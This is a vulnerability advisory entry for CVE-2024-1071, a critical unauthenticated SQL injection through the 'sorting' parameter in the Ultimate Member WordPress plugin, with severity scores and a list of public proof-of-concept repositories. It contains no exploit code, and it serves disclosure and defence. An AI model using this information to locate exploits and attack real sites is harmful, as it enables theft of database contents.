CVE-2024-1071
Description
The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
NVD
Severity: N/A
CVE ID: CVE-2024-1071
CVSS Score: N/A
CVSS Metrics: NVD assessment not yet provided.
Wordfence
Severity: CRITICAL
CVE ID: CVE-2024-1071
CVSS Score: 9.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Proof Of Concept
Nuclei Templates for CVE-2024-1071
Refrence: Project Discovery GitHub
gbrsh
Ultimate Member Unauthorized Database Access / SQLi
Refrence: GitHub
Trackflaw
CVE-2024-1071 with Docker
Refrence: GitHub
Matrexdz
CVE-2024-1071
Refrence: GitHub
Matrexdz
Refrence: GitHub